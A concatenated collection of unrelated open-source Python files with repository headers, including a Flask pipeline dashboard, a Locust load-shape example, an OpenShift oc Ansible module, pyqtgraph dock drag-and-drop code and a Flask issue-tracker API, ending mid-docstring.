            'ended': datestr(ex.finish_time) if ex else None,
            'started': datestr(ex.start_time) if ex else None,
            'last_success':
                datestr(success_ex.finish_time) if success_ex else None,
        }
        statuses.append(pipeline_obj)

    # Predicates used by the category table below.
    def state_and_not_dirty(state, p):
        return p.get('state') == state and not p.get('dirty')

    def state_or_dirty(state, p):
        return p.get('state') == state or p.get('dirty')

    # Each category starts as [key, label, predicate] and is extended in
    # the loop below with [matching pipelines, count, hierarchy tree].
    categories = [
        ['ALL', 'All Pipelines', lambda _, __: True],
        ['INVALID', "Can't start", lambda _, p: not p['runnable']],
        ['QUEUED', 'Waiting to run', lambda state, p: p['state'] == state],
        ['RUNNING', 'Running', state_and_not_dirty],
        ['FAILED', 'Failed Execution', state_and_not_dirty],
        ['SUCCEEDED', 'Successful Execution', state_and_not_dirty],
    ]
    for item in categories:
        # deepcopy: make_hierarchies mutates the status dicts in place.
        item.append([p for p in deepcopy(statuses)
                     if item[2](item[0], p)])
        item.append(len(item[-1]))
        item.append(make_hierarchies(item[-2]))
    return render_template('dashboard.html',
                           categories=categories,
                           yamlize=yamlize,
                           markdown=markdown)
@blueprint.route("api/raw/status")
@basic_auth_required
def pipeline_raw_api_status():
    """Summarize every pipeline, stripping the bulky per-pipeline fields."""
    pipelines = sorted(status.all_statuses(), key=lambda x: x.get('id'))
    for pipeline in pipelines:
        # can get the full details from api/raw/<path:pipeline_id>
        for attr in ("pipeline", "reason", "error_log"):
            pipeline.pop(attr, None)
    return jsonify(pipelines)
@blueprint.route("api/raw/<path:pipeline_id>")
@basic_auth_required
def pipeline_raw_api(pipeline_id):
    """Return the full raw status of a single pipeline as JSON."""
    if not pipeline_id.startswith('./'):
        pipeline_id = './' + pipeline_id
    pipeline_status = status.get(pipeline_id)
    # 404 for ids the status manager has never seen.
    if not pipeline_status.pipeline_details:
        abort(404)
    last_execution = pipeline_status.get_last_execution()
    last_successful_execution = pipeline_status.get_last_successful_execution()
    # Execution-derived fields are None when the pipeline never ran.
    ret = {
        "id": pipeline_id,
        "cache_hash": pipeline_status.cache_hash,
        "dirty": pipeline_status.dirty(),

        "queued": last_execution.queue_time if last_execution else None,
        "started": last_execution.start_time if last_execution else None,
        "ended": last_execution.finish_time if last_execution else None,
        "reason": last_execution.log if last_execution else None,
        "error_log": pipeline_status.errors(),
        "stats": last_execution.stats if last_execution else None,
        "success": last_execution.success if last_execution else None,
        "last_success":
            last_successful_execution.finish_time
            if last_successful_execution else None,
        "trigger": last_execution.trigger if last_execution else None,

        "pipeline": pipeline_status.pipeline_details,
        "source": pipeline_status.source_spec,

        "message": pipeline_status.state().capitalize(),
        "state": pipeline_status.state(),
    }

    return jsonify(ret)
@blueprint.route("api/<field>/<path:pipeline_id>")
@basic_auth_required
def pipeline_api(field, pipeline_id):
    """Return one field of a pipeline (pipeline/source YAML or the log)
    as a JSON object of text lines."""
    if not pipeline_id.startswith('./'):
        pipeline_id = './' + pipeline_id
    pipeline_status = status.get(pipeline_id)
    if not pipeline_status.pipeline_details:
        abort(404)
    if field == 'pipeline':
        text = yamlize(pipeline_status.pipeline_details)
    elif field == 'source':
        text = yamlize(pipeline_status.source_spec)
    elif field == 'log':
        last_execution = pipeline_status.get_last_execution()
        text = last_execution.log if last_execution else ''
    else:
        # Unknown field name.
        abort(400)
    return jsonify({'text': text.split('\n')})
def _make_badge_response(subject, text, colour):
    """Fetch a shields.io badge and return it with caching disabled."""
    image_url = 'https://img.shields.io/badge/{}-{}-{}.svg'.format(
        subject, text, colour)
    r = requests.get(image_url)
    buffer_image = BytesIO(r.content)
    buffer_image.seek(0)
    res = make_response(send_file(buffer_image, mimetype='image/svg+xml'))
    # Badges are embedded in READMEs; forbid caching so the status shown
    # stays current.
    res.headers['Cache-Control'] = \
        'max-age=0, no-cache, no-store, must-revalidate'
    res.headers['Expires'] = '0'
    return res
@blueprint.route("badge/<path:pipeline_id>")
def badge(pipeline_id):
    '''An individual pipeline status'''
    if not pipeline_id.startswith('./'):
        pipeline_id = './' + pipeline_id
    pipeline_status = status.get(pipeline_id)
    # Gray for unknown pipelines or indeterminate state.
    colour = 'lightgray'
    if not pipeline_status.pipeline_details:
        text = "not found"
    else:
        text = pipeline_status.state().lower()
        last_execution = pipeline_status.get_last_execution()
        success = last_execution.success if last_execution else None
        if success is True:
            stats = last_execution.stats if last_execution else None
            record_count = stats.get('count_of_rows')
            if record_count is not None:
                text += ' (%d records)' % record_count
            colour = 'brightgreen'
        elif success is False:
            colour = 'red'
    return _make_badge_response('pipeline', text, colour)
@blueprint.route("badge/collection/<path:pipeline_path>")
def badge_collection(pipeline_path):
    '''Status badge for a collection of pipelines.'''
    all_pipeline_ids = sorted(status.all_pipeline_ids())
    if not pipeline_path.startswith('./'):
        pipeline_path = './' + pipeline_path

    # Filter pipeline ids to only include those that start with pipeline_path.
    path_pipeline_ids = \
        [p for p in all_pipeline_ids if p.startswith(pipeline_path)]

    statuses = []
    for pipeline_id in path_pipeline_ids:
        pipeline_status = status.get(pipeline_id)
        if pipeline_status is None:
            abort(404)
        status_text = pipeline_status.state().lower()
        statuses.append(status_text)

    # Colour policy: green only when every pipeline succeeded, red when any
    # failed, yellow when none failed but not all succeeded, gray when the
    # path matched nothing.
    status_color = 'lightgray'
    status_counter = Counter(statuses)
    if status_counter:
        if len(status_counter) == 1 and status_counter['succeeded'] > 0:
            status_color = 'brightgreen'
        elif status_counter['failed'] > 0:
            status_color = 'red'
        elif status_counter['failed'] == 0:
            status_color = 'yellow'
        # Badge text is a summary like "3 succeeded, 1 failed".
        status_text = \
            ', '.join(['{} {}'.format(v, k)
                       for k, v in status_counter.items()])
    else:
        status_text = "not found"
    return _make_badge_response('pipelines', status_text, status_color)
app = Flask(__name__)
app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True

# Enable HTTP basic auth only when both credentials are configured in the
# environment; otherwise basic_auth_required is a no-op.
if os.environ.get('DPP_BASIC_AUTH_USERNAME', False) \
        and os.environ.get('DPP_BASIC_AUTH_PASSWORD', False):
    app.config['BASIC_AUTH_USERNAME'] = os.environ['DPP_BASIC_AUTH_USERNAME']
    app.config['BASIC_AUTH_PASSWORD'] = os.environ['DPP_BASIC_AUTH_PASSWORD']
    app.config['BASIC_AUTH_ACTIVE'] = True

basic_auth = BasicAuth(app)

CORS(app)

# Mount all routes under DPP_BASE_PATH, normalized to end with '/'.
url_prefix = os.environ.get('DPP_BASE_PATH', '/')
if not url_prefix.endswith('/'):
    url_prefix += '/'

logging.info('Serving on path %s', url_prefix)

app.register_blueprint(blueprint, url_prefix=url_prefix)
|
morepath/__init__.py | hugovk/morepath | 314 | 10144 | # flake8: noqa
"""This is the main public API of Morepath.
Additional public APIs can be imported from the :mod:`morepath.error`
and :mod:`morepath.pdbsupport` modules. For custom directive
implementations that interact with core directives for grouping or
subclassing purposes, or that need to use one of the Morepath
registries, you may need to import from :mod:`morepath.directive`.
The other submodules are considered private. If you find yourself
needing to import from them in application or extension code, please
report an issue about it on the Morepath issue tracker.
"""
from dectate import commit
from .app import App, dispatch_method
from .core import (
excview_tween_factory as EXCVIEW,
poisoned_host_header_protection_tween_factory as HOST_HEADER_PROTECTION,
model_predicate,
name_predicate,
request_method_predicate,
)
from .core import request_method_predicate as LAST_VIEW_PREDICATE
from .view import render_json, render_html, redirect
from .request import Request, Response
from .autosetup import scan, autoscan
from .authentication import Identity, IdentityPolicy, NO_IDENTITY
from .converter import Converter
from .reify import reify
from .run import run
|
examples/custom_shape/stages.py | oksumoron/locust | 18,336 | 10172 | <reponame>oksumoron/locust<filename>examples/custom_shape/stages.py
from locust import HttpUser, TaskSet, task, constant
from locust import LoadTestShape
class UserTasks(TaskSet):
    """Task set with a single task that fetches the site root."""

    @task
    def get_root(self):
        """GET / against the target host."""
        self.client.get("/")
class WebsiteUser(HttpUser):
    """Simulated user: runs UserTasks with a fixed 0.5s wait between tasks."""

    wait_time = constant(0.5)
    tasks = [UserTasks]
class StagesShape(LoadTestShape):
    """
    A simple load test shape class that has different user count and
    spawn_rate at different stages.

    Keyword arguments:

        stages -- A list of dicts, each representing a stage with the
        following keys:
            duration -- When this many seconds pass the test is advanced
                        to the next stage (an absolute run-time threshold,
                        not a per-stage length)
            users -- Total user count
            spawn_rate -- Number of users to start/stop per second

    Note: ``tick`` below only reads duration/users/spawn_rate; extra keys
    such as ``stop`` or ``stop_at_end`` are not honored by this example.
    """

    stages = [
        {"duration": 60, "users": 10, "spawn_rate": 10},
        {"duration": 100, "users": 50, "spawn_rate": 10},
        {"duration": 180, "users": 100, "spawn_rate": 10},
        {"duration": 220, "users": 30, "spawn_rate": 10},
        {"duration": 230, "users": 10, "spawn_rate": 10},
        {"duration": 240, "users": 1, "spawn_rate": 1},
    ]

    def tick(self):
        """Return (users, spawn_rate) for the current stage, or None to stop."""
        run_time = self.get_run_time()

        # Stages are checked in order against the absolute run time; the
        # first one whose threshold has not yet passed is active.
        for stage in self.stages:
            if run_time < stage["duration"]:
                tick_data = (stage["users"], stage["spawn_rate"])
                return tick_data

        # All stages have elapsed; returning None ends the test.
        return None
|
docs_src/options/callback/tutorial001.py | madkinsz/typer | 7,615 | 10194 | import typer
def name_callback(value: str):
    """Validate the name option; only "Camila" is accepted."""
    if value == "Camila":
        return value
    raise typer.BadParameter("Only Camila is allowed")
def main(name: str = typer.Option(..., callback=name_callback)):
    # ``...`` makes --name required; the callback validates it before use.
    typer.echo(f"Hello {name}")
if __name__ == "__main__":
    # Run ``main`` as a single-command Typer CLI.
    typer.run(main)
|
examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_alternating_legs_env_randomizer.py | felipeek/bullet3 | 9,136 | 10221 | """Randomize the minitaur_gym_alternating_leg_env when reset() is called.
The randomization include swing_offset, extension_offset of all legs that mimics
bent legs, desired_pitch from user input, battery voltage and motor damping.
"""
# Make the package importable when this file is run directly: walk four
# directories up from this file and prepend that root to sys.path.
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
parentdir = os.path.dirname(os.path.dirname(parentdir))
os.sys.path.insert(0, parentdir)
import numpy as np
import tf.compat.v1 as tf
from pybullet_envs.minitaur.envs import env_randomizer_base
# Absolute range.
NUM_LEGS = 4
# Sampling ranges for battery voltage (volts) and motor viscous damping,
# used by randomize_env below.
BATTERY_VOLTAGE_RANGE = (14.8, 16.8)
MOTOR_VISCOUS_DAMPING_RANGE = (0, 0.01)
class MinitaurAlternatingLegsEnvRandomizer(env_randomizer_base.EnvRandomizerBase):
  """A randomizer that changes the minitaur_gym_alternating_leg_env.

  On each randomization it perturbs the leg swing/extension offsets and the
  desired pitch, and re-samples the battery voltage and motor damping.
  """

  def __init__(self,
               perturb_swing_bound=0.1,
               perturb_extension_bound=0.1,
               perturb_desired_pitch_bound=0.01):
    """Initializes the randomizer.

    Args:
      perturb_swing_bound: Absolute bound for the per-leg swing offset.
      perturb_extension_bound: Absolute bound for the per-leg extension offset.
      perturb_desired_pitch_bound: Absolute bound for the desired pitch offset.
    """
    super(MinitaurAlternatingLegsEnvRandomizer, self).__init__()
    self.perturb_swing_bound = perturb_swing_bound
    self.perturb_extension_bound = perturb_extension_bound
    self.perturb_desired_pitch_bound = perturb_desired_pitch_bound

  def randomize_env(self, env):
    """Randomizes the given environment; intended to run on reset()."""
    # Per-leg swing offsets that mimic slightly bent legs.
    perturb_magnitude = np.random.uniform(low=-self.perturb_swing_bound,
                                          high=self.perturb_swing_bound,
                                          size=NUM_LEGS)
    env.set_swing_offset(perturb_magnitude)
    tf.logging.info("swing_offset: {}".format(perturb_magnitude))
    # Per-leg extension offsets.
    perturb_magnitude = np.random.uniform(low=-self.perturb_extension_bound,
                                          high=self.perturb_extension_bound,
                                          size=NUM_LEGS)
    env.set_extension_offset(perturb_magnitude)
    tf.logging.info("extension_offset: {}".format(perturb_magnitude))
    # Scalar perturbation of the desired pitch.
    perturb_magnitude = np.random.uniform(low=-self.perturb_desired_pitch_bound,
                                          high=self.perturb_desired_pitch_bound)
    env.set_desired_pitch(perturb_magnitude)
    tf.logging.info("desired_pitch: {}".format(perturb_magnitude))
    # Hardware variation: battery voltage and motor viscous damping.
    randomized_battery_voltage = np.random.uniform(BATTERY_VOLTAGE_RANGE[0],
                                                   BATTERY_VOLTAGE_RANGE[1])
    env.minitaur.SetBatteryVoltage(randomized_battery_voltage)
    tf.logging.info("battery_voltage: {}".format(randomized_battery_voltage))
    randomized_motor_damping = np.random.uniform(MOTOR_VISCOUS_DAMPING_RANGE[0],
                                                 MOTOR_VISCOUS_DAMPING_RANGE[1])
    env.minitaur.SetMotorViscousDamping(randomized_motor_damping)
    tf.logging.info("motor_damping: {}".format(randomized_motor_damping))
|
roles/openshift_health_checker/library/ocutil.py | shgriffi/openshift-ansible | 164 | 10226 | #!/usr/bin/python
"""Interface to OpenShift oc command"""
import os
import shlex
import shutil
import subprocess
from ansible.module_utils.basic import AnsibleModule
# Extra directories searched beyond $PATH; ansible/sudo may strip these.
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]


def locate_oc_binary():
    """Find and return oc binary file"""
    # https://github.com/openshift/openshift-ansible/issues/3410
    # oc can be in /usr/local/bin in some cases, but that may not
    # be in $PATH due to ansible/sudo
    search_paths = os.environ.get("PATH", os.defpath).split(os.pathsep)
    search_paths += ADDITIONAL_PATH_LOOKUPS

    oc_binary = 'oc'

    # Use shutil.which when available (Python 3); otherwise fall back to a
    # naive scan of the candidate directories (Python 2).
    try:
        resolved = shutil.which(oc_binary, path=os.pathsep.join(search_paths))
    except AttributeError:
        for directory in search_paths:
            candidate = os.path.join(directory, oc_binary)
            if os.path.exists(candidate):
                oc_binary = candidate
                break
    else:
        if resolved is not None:
            oc_binary = resolved

    return oc_binary
def main():
    """Module that executes commands on a remote OpenShift cluster"""
    module = AnsibleModule(
        argument_spec=dict(
            namespace=dict(type="str", required=False),
            config_file=dict(type="str", required=True),
            cmd=dict(type="str", required=True),
            extra_args=dict(type="list", default=[]),
        ),
    )

    # Build the oc command line: binary, kubeconfig, optional namespace,
    # then the user-supplied command plus any extra args.
    cmd = [locate_oc_binary(), '--config', module.params["config_file"]]
    if module.params["namespace"]:
        cmd += ['-n', module.params["namespace"]]
    cmd += shlex.split(module.params["cmd"]) + module.params["extra_args"]

    failed = True
    try:
        cmd_result = subprocess.check_output(list(cmd), stderr=subprocess.STDOUT)
        failed = False
    except subprocess.CalledProcessError as exc:
        # Non-zero exit: report rc, the command line, and combined output.
        cmd_result = '[rc {}] {}\n{}'.format(exc.returncode, ' '.join(exc.cmd), exc.output)
    except OSError as exc:
        # we get this when 'oc' is not there
        cmd_result = str(exc)

    module.exit_json(
        changed=False,
        failed=failed,
        result=cmd_result,
    )


if __name__ == '__main__':
    main()
|
Python/swap_numbers.py | saurabhcommand/Hello-world | 1,428 | 10245 | a = 5
b = 7
a,b = b,a
print a
print b
|
minotaur/_minotaur.py | giannitedesco/minotaur | 172 | 10257 | <filename>minotaur/_minotaur.py
from typing import Dict, Tuple, Optional
from pathlib import Path
import asyncio
from ._mask import Mask
from ._event import Event
from ._base import InotifyBase
# Only Minotaur is public; Notification instances are returned by it but
# not constructed by callers.
__all__ = ('Minotaur',)


class Notification:
    """A single inotify event resolved (best-effort) to a filesystem path."""

    __slots__ = (
        '_path',
        '_type',
        '_isdir',
        '_unmount',
        '_qoverflow',
    )

    def __init__(self,
                 path: Path,
                 type: Mask,
                 isdir: bool,
                 unmount: bool,
                 qoverflow: bool = False) -> None:
        self._path = path
        self._type = type
        self._isdir = bool(isdir)
        self._unmount = bool(unmount)
        self._qoverflow = bool(qoverflow)

    @property
    def isdir(self) -> bool:
        # True if the event subject was a directory.
        return self._isdir

    @property
    def unmount(self) -> bool:
        # True if the watched filesystem was unmounted.
        return self._unmount

    @property
    def qoverflow(self) -> bool:
        # True if the kernel event queue overflowed (events were lost).
        return self._qoverflow

    @property
    def path(self) -> Path:
        return self._path

    def __repr__(self) -> str:
        t = self._isdir and 'dir' or 'file'
        return f'{type(self).__name__}({self._type.name} {t} {self._path})'

    @classmethod
    def create(cls, path: Path, mask: Mask) -> 'Notification':
        """Build a Notification by splitting *mask* into type and flag bits."""
        return cls(path,
                   mask & Mask.EVENT_TYPE,
                   bool(mask & Mask.ISDIR),
                   bool(mask & Mask.UNMOUNT),
                   bool(mask & Mask.Q_OVERFLOW))
class Minotaur(InotifyBase):
    """
    Fancy interface for Inotify which does questionable things like:

    1. Resolve watch-descriptors back to paths (which races with renames of
       original paths and can't be used safely, but other inotify packages
       provide this feature, so here it is for your delectation).

    2. Link rename_from/rename_to events together. This feature would be
       useful but isn't yet actually implemented. Working on it...
    """

    __slots__ = (
        '_wdmap',
        '_cmap',
    )

    # Watch descriptor -> resolved path, used by _resolve_path().
    _wdmap: Dict[int, Path]
    _cmap: Dict[Tuple[int, int], Event]

    def __init__(self,
                 blocking: bool = True,
                 cloexec: bool = True,
                 loop: Optional[asyncio.AbstractEventLoop] = None,
                 ) -> None:
        super().__init__(blocking, cloexec, loop)
        self._wdmap = {}
        self._cmap = {}

    def add_watch(self, p: Path, mask: Mask) -> int:
        """Add a watch for *p* and remember its resolved path."""
        # The previous try/except only re-raised, so the plain form is
        # equivalent: the mapping is recorded only if add_watch succeeds.
        wd = super().add_watch(p, mask)
        self._wdmap[wd] = p.resolve()
        return wd

    def rm_watch(self, wd: int) -> int:
        """Remove a watch and forget its path mapping."""
        ret = super().rm_watch(wd)
        # Bug fix: the old code placed this cleanup in a try/else after a
        # ``return``, so it never ran and _wdmap leaked an entry per watch.
        self._wdmap.pop(wd, None)
        return ret

    def _resolve_path(self, wd: int, name: Path) -> Path:
        """Best-effort mapping of a watch descriptor back to a full path."""
        try:
            base_dir = self._wdmap[wd]
        except KeyError:
            # Unknown descriptor (e.g. queue overflow); fall back to the
            # bare event name.
            path = name
        else:
            path = base_dir / name
        return path

    def __next__(self) -> Notification:
        evt = super()._next_event()
        if evt is None:
            raise StopIteration
        # TODO: Link rename_from/rename_to together if we have them
        path = self._resolve_path(evt.wd, evt.name)
        return Notification.create(path, evt.mask)

    async def __anext__(self) -> Notification:
        evt = await super()._next_event_async()
        if evt is None:
            # Bug fix: async iterators must raise StopAsyncIteration;
            # raising StopIteration inside a coroutine is turned into a
            # RuntimeError by the interpreter (PEP 479 / PEP 525).
            raise StopAsyncIteration
        path = self._resolve_path(evt.wd, evt.name)
        return Notification.create(path, evt.mask)
|
pyclustering/container/examples/__init__.py | JosephChataignon/pyclustering | 1,013 | 10258 | <reponame>JosephChataignon/pyclustering
"""!
@brief Collection of examples devoted to containers.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
""" |
tests/conftest.py | junjunjunk/torchgpipe | 532 | 10262 | <reponame>junjunjunk/torchgpipe
import pytest
import torch
@pytest.fixture(autouse=True)
def manual_seed_zero():
    """Seed torch's RNG before every test so results are reproducible."""
    torch.manual_seed(0)
@pytest.fixture(scope='session')
def cuda_sleep():
    """Session fixture returning a function that busy-waits on the GPU for
    a given number of (wall-clock) seconds."""
    # Warm up the CUDA context so the calibration below isn't skewed by
    # one-time initialization cost.
    torch.empty(1, device='cuda')

    # Calibrate how many GPU cycles elapse per millisecond.
    # From test/test_cuda.py in PyTorch.
    tic = torch.cuda.Event(enable_timing=True)
    toc = torch.cuda.Event(enable_timing=True)
    tic.record()
    torch.cuda._sleep(1000000)
    toc.record()
    toc.synchronize()
    cycles_per_ms = 1000000 / tic.elapsed_time(toc)

    def cuda_sleep(seconds):
        torch.cuda._sleep(int(seconds * cycles_per_ms * 1000))

    return cuda_sleep
def pytest_report_header():
    """Show the installed torch version in the pytest session header."""
    return 'torch: ' + torch.__version__
|
pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 2,762 | 10289 | <reponame>hishizuka/pyqtgraph
# -*- coding: utf-8 -*-
from ..Qt import QtCore, QtGui
class DockDrop(object):
    """Provides dock-dropping methods (mixed into widgets that accept
    Dock drags). Tracks which edge of the widget the drag is hovering
    over and shows/hides the translucent DropAreaOverlay accordingly."""

    def __init__(self, allowedAreas=None):
        object.__init__(self)
        if allowedAreas is None:
            allowedAreas = ['center', 'right', 'left', 'top', 'bottom']
        self.allowedAreas = set(allowedAreas)
        self.setAcceptDrops(True)
        self.dropArea = None
        self.overlay = DropAreaOverlay(self)
        self.overlay.raise_()

    def resizeOverlay(self, size):
        self.overlay.resize(size)

    def raiseOverlay(self):
        self.overlay.raise_()

    def dragEnterEvent(self, ev):
        # Only accept drags that originate from a Dock.
        src = ev.source()
        if hasattr(src, 'implements') and src.implements('dock'):
            #print "drag enter accept"
            ev.accept()
        else:
            #print "drag enter ignore"
            ev.ignore()

    def dragMoveEvent(self, ev):
        #print "drag move"
        # QDragMoveEvent inherits QDropEvent which provides posF()
        # PyQt6 provides only position()
        posF = ev.posF() if hasattr(ev, 'posF') else ev.position()
        ld = posF.x()               # distance from the left edge
        rd = self.width() - ld      # ... from the right edge
        td = posF.y()               # ... from the top edge
        bd = self.height() - td     # ... from the bottom edge
        mn = min(ld, rd, td, bd)
        if mn > 30:
            # Far from every edge: drop goes to the center.
            self.dropArea = "center"
        elif (ld == mn or rd == mn) and mn > self.height() / 3.:
            # Bug fix: nearest to a *left/right* edge but still deep inside
            # vertically counts as center (the original compared mixed
            # left/top and right/left distances, so edge detection was
            # inconsistent; restored upstream pyqtgraph behaviour).
            self.dropArea = "center"
        elif (td == mn or bd == mn) and mn > self.width() / 3.:
            # Same for the top/bottom edges relative to the widget width.
            self.dropArea = "center"
        elif rd == mn:
            self.dropArea = "right"
        elif ld == mn:
            self.dropArea = "left"
        elif td == mn:
            self.dropArea = "top"
        elif bd == mn:
            self.dropArea = "bottom"
        if ev.source() is self and self.dropArea == 'center':
            #print "  no self-center"
            self.dropArea = None
            ev.ignore()
        elif self.dropArea not in self.allowedAreas:
            #print "  not allowed"
            self.dropArea = None
            ev.ignore()
        else:
            #print "  ok"
            ev.accept()
        self.overlay.setDropArea(self.dropArea)

    def dragLeaveEvent(self, ev):
        self.dropArea = None
        self.overlay.setDropArea(self.dropArea)

    def dropEvent(self, ev):
        area = self.dropArea
        if area is None:
            return
        if area == 'center':
            # 'center' drops stack the dock above this one.
            area = 'above'
        self.area.moveDock(ev.source(), area, self)
        self.dropArea = None
        self.overlay.setDropArea(self.dropArea)
class DropAreaOverlay(QtGui.QWidget):
    """Overlay widget that draws drop areas during a drag-drop operation"""
    def __init__(self, parent):
        QtGui.QWidget.__init__(self, parent)
        self.dropArea = None
        self.hide()
        # Let mouse/drag events pass through to the widgets underneath.
        self.setAttribute(QtCore.Qt.WidgetAttribute.WA_TransparentForMouseEvents)
    def setDropArea(self, area):
        # area: 'left' / 'right' / 'top' / 'bottom' / 'center', or None to hide.
        self.dropArea = area
        if area is None:
            self.hide()
        else:
            ## Resize overlay to just the region where drop area should be displayed.
            ## This works around a Qt bug--can't display transparent widgets over QGLWidget
            prgn = self.parent().rect()
            rgn = QtCore.QRect(prgn)
            # Edge strips are at most 30 px or one third of the parent,
            # whichever is smaller.
            w = min(30, prgn.width()/3.)
            h = min(30, prgn.height()/3.)
            if self.dropArea == 'left':
                rgn.setWidth(w)
            elif self.dropArea == 'right':
                rgn.setLeft(rgn.left() + prgn.width() - w)
            elif self.dropArea == 'top':
                rgn.setHeight(h)
            elif self.dropArea == 'bottom':
                rgn.setTop(rgn.top() + prgn.height() - h)
            elif self.dropArea == 'center':
                rgn.adjust(w, h, -w, -h)
            self.setGeometry(rgn)
            self.show()
        self.update()
    def paintEvent(self, ev):
        if self.dropArea is None:
            return
        # Translucent blue fill with a darker 3 px outline.
        p = QtGui.QPainter(self)
        rgn = self.rect()
        p.setBrush(QtGui.QBrush(QtGui.QColor(100, 100, 255, 50)))
        p.setPen(QtGui.QPen(QtGui.QColor(50, 50, 150), 3))
        p.drawRect(rgn)
|
homeassistant/components/kaiterra/const.py | MrDelik/core | 30,023 | 10305 | """Consts for Kaiterra integration."""
from datetime import timedelta
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
Platform,
)
# Integration domain and the dispatcher signal used to broadcast updates.
DOMAIN = "kaiterra"
DISPATCHER_KAITERRA = "kaiterra_update"

# AQI scale breakpoints per national standard (cn / in / us). Each list is
# the ordered boundary values; AQI_LEVEL below holds one human-readable
# label per interval between consecutive boundaries.
AQI_SCALE = {
    "cn": [0, 50, 100, 150, 200, 300, 400, 500],
    "in": [0, 50, 100, 200, 300, 400, 500],
    "us": [0, 50, 100, 150, 200, 300, 500],
}
AQI_LEVEL = {
    "cn": [
        "Good",
        "Satisfactory",
        "Moderate",
        "Unhealthy for sensitive groups",
        "Unhealthy",
        "Very unhealthy",
        "Hazardous",
    ],
    "in": [
        "Good",
        "Satisfactory",
        "Moderately polluted",
        "Poor",
        "Very poor",
        "Severe",
    ],
    "us": [
        "Good",
        "Moderate",
        "Unhealthy for sensitive groups",
        "Unhealthy",
        "Very unhealthy",
        "Hazardous",
    ],
}

# Extra entity state-attribute names.
ATTR_VOC = "volatile_organic_compounds"
ATTR_AQI_LEVEL = "air_quality_index_level"
ATTR_AQI_POLLUTANT = "air_quality_index_pollutant"

# Supported configuration values.
AVAILABLE_AQI_STANDARDS = ["us", "cn", "in"]
# NOTE(review): "x" appears to be a dimensionless unit as reported by the
# Kaiterra API -- TODO confirm against the API docs.
AVAILABLE_UNITS = [
    "x",
    PERCENTAGE,
    "C",
    "F",
    CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
    CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
    CONCENTRATION_PARTS_PER_MILLION,
    CONCENTRATION_PARTS_PER_BILLION,
]
AVAILABLE_DEVICE_TYPES = ["laseregg", "sensedge"]

# Config entry option keys and their defaults.
CONF_AQI_STANDARD = "aqi_standard"
CONF_PREFERRED_UNITS = "preferred_units"
DEFAULT_AQI_STANDARD = "us"
DEFAULT_PREFERRED_UNIT: list[str] = []
DEFAULT_SCAN_INTERVAL = timedelta(seconds=30)

# Platforms set up for this integration.
PLATFORMS = [Platform.SENSOR, Platform.AIR_QUALITY]
|
apps/project/views/issue.py | rainydaygit/testtcloudserver | 349 | 10320 | <reponame>rainydaygit/testtcloudserver
from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
bpname = 'issue'  # blueprint name, also used as the permission name prefix
view_permission = f'{bpname}_view'      # read-only access permission
modify_permission = f'{bpname}_modify'  # write access permission
issue = tblueprint(bpname, __name__)    # flask blueprint for all /issue routes
# 新增issue
@issue.route('/', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_create')
def issue_add_handler():
    """
    @api {post} /v1/issue 新增 缺陷
    @apiName CreateIssue
    @apiGroup 项目
    @apiDescription 新增缺陷;字段由 issue_create 表单 schema 校验:
        module_id/handler/issue_type/chance/level/priority/system/title/
        attach/description/detection_chance/project_id/version/creator/
        modifier,可选 requirement_id 与 tag。
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    # The validated form yields the fields in a fixed order; forward them
    # verbatim to the business layer.
    (system, version, project_id, module_id, creator, modifier, handler,
     issue_type, chance, level, priority, stage, title, attach,
     handle_status, description, comment, detection_chance, requirement_id,
     case_covered, tag) = parse_json_form('issue_create')
    code = IssueBusiness.create(system, version, project_id, module_id,
                                creator, modifier, handler, issue_type,
                                chance, level, priority, stage, title,
                                attach, handle_status, description, comment,
                                detection_chance, requirement_id,
                                case_covered, tag)
    return json_detail_render(code)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_modify')
def issue_modify_handler(issue_id):
    """
    @api {post} /v1/issue/{int:id} 修改 缺陷
    @apiName ModifyIssue
    @apiGroup 项目
    @apiDescription 修改缺陷;字段由 issue_modify 表单 schema 校验:
        module_id/handler/issue_type/chance/level/priority/system/title/
        attach/description/detection_chance/project_id/version/modifier,
        可选 requirement_id 与 tag。
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    # Same field ordering as the issue_modify schema definition.
    (system, version, project_id, module_id, modifier, handler, issue_type,
     chance, level, priority, stage, title, attach, handle_status,
     description, comment, detection_chance, requirement_id, case_covered,
     tag) = parse_json_form('issue_modify')
    code = IssueBusiness.modify(issue_id, system, version, project_id,
                                module_id, modifier, handler, issue_type,
                                chance, level, priority, stage, title,
                                attach, handle_status, description, comment,
                                detection_chance, requirement_id,
                                case_covered, tag)
    return json_detail_render(code)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['DELETE'])
def issue_delete_handler(issue_id):
    """
    @api {delete} /v1/issue/{int:id} 删除 缺陷
    @apiName DeleteIssue
    @apiGroup 项目
    @apiDescription 删除指定 ID 的缺陷
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    return json_detail_render(IssueBusiness.delete(issue_id))
# 切换issue状态
@issue.route('/handlestatus/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:handle_status')
def issue_board_status_handler(issue_id):
    """
    @api {post} /v1/issue/handlestatus/{int:id} 切换 缺陷状态
